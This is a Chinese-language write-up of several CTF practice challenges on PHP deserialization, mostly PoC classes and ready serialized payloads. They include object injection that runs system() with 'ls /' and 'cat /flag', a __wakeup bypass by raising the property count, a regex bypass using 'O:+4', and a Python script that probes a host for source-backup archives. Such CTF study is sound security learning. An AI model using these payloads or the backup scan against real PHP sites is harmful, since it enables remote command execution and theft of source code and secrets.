php反序列化刷题1

时间:2024-03-26 11:44:05

[SWPUCTF 2021 新生赛]ez_unserialize

查看源代码想到robots协议

看这个代码比较简单

直接让admin=admin passwd=ctf就行了

poc

<?php
class wllm
{
  public $admin;
  public $passwd;
}

$p = new wllm();
$p->admin = "admin";
$p->passwd = "ctf";
echo serialize($p);;
?> 

payload:

?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

[SWPUCTF 2022 新生赛]1z_unserialize

搞懂这个$a($this->lly);

关键语句

$a() 表示调用一个函数,函数名由变量 $a 的值确定。换句话说,$a 应该是一个存储函数名的变量。当你写 $b() 时,PHP 将尝试调用这个函数,并传递任何必要的参数。

     //例如,如果你有一个函数名存储在变量 $a 中,比如 $a = "myFunction";,然后你写 $a(),PHP 将尝试调用 myFunction() 这个函数。

而$a()括号里面的值应该是向函数传递的参数

这样我们让$a的值为命令执行函数 我们就可以成功的命令执行了

poc

class lyh
{
  public $url = 'NSSCTF.com';
  public $lt = 'system';
  public $lly = 'ls /';}

  $a = new lyh();
  echo serialize($a);

payload

nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:4:"ls /";}

nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}

wakeup()绕过

当反序列化字符串中,表示属性个数的值⼤于真实属性个数时,会绕过 __wakeup 函数的执⾏。

    漏洞影响范围
    PHP5 < 5.6.25
    PHP7 < 7.0.10

标准序列化结果
O:4:"User":2:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}
将2改为3 绕过__Wakeup魔法函数
O:4:"User":3:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}

[SWPUCTF 2022 新生赛]ez_ez_unserialize

poc

class X
{
  public $x = 'fllllllag . php';
}

$lcycb = new x();
echo serialize($lcycb);

payload:

x=O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}

Web_php_unserialize攻防世界

这里就是要绕过这个正则

if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 

匹配到任意长度的数字 或者oc(类似数字)字符都会被过滤

绕过方式数字前加正号,如+4,正好不改变正数的值,却可以绕过检测

poc

class Demo
  {
    private $file = 'fl4g.php';
    public function __sleep()
    {
      return ['file'];
    }
  }
  $lcycb = new Demo();
  $lcycb = serialize($lcycb);
  echo $lcycb;
  $lcycb = str_replace('O:4', 'O:+4', $lcycb);
  $lcycb = str_replace('"Demo":1:', '"Demo":2:', $lcycb);
  echo $lcycb;
  echo base64_encode($lcycb);
  ?>

payload

?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

unserialize3攻防世界

poc

class xctf{
public $flag = '111';}
$lcycb = new xctf;
echo serialize($lcycb);

payload

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

[极客大挑战 2019]PHP BUUCTF

用脚本扫一下备份

import requests

url1 = 'http://dbd62227-e75f-44c3-8862-b369e671379e.node5.buuoj.cn:81/'		# url为被扫描地址,后不加‘/’

# 常见的网站源码备份文件名
list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
# 常见的网站源码备份文件后缀
list2 = ['tar', 'tar.gz', 'zip', 'rar']

for i in list1:
    for j in list2:
        back = str(i) + '.' + str(j)
        url = str(url1) + '/' + back
        print(back + '    ', end='')
        print(requests.get(url).status_code)

找到

include 'flag.php';


error_reporting(0);


class Name
{
  private $username = 'nonono';
  private $password = 'yesyes';

  public function __construct($username, $password)
  {
    $this->username = $username;
    $this->password = $password;
  }

  function __wakeup()
  {
    $this->username = 'guest';
  }

  function __destruct()
  {
    if ($this->password != 100) {
      echo "</br>NO!!!hacker!!!</br>";
      echo "You name is: ";
      echo $this->username;
      echo "</br>";
      echo "You password is: ";
      echo $this->password;
      echo "</br>";
      die();
    }
    if ($this->username === 'admin') {
      global $flag;
      echo $flag;
    } else {
      echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
      die();
    }
  }
}

poc

include 'flag.php';


error_reporting(0);


class Name
{
  private $username = 'admin';
  private $password = '100';

 
}
$lcycb = new Name();
echo serialize($lcycb);

payload:

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}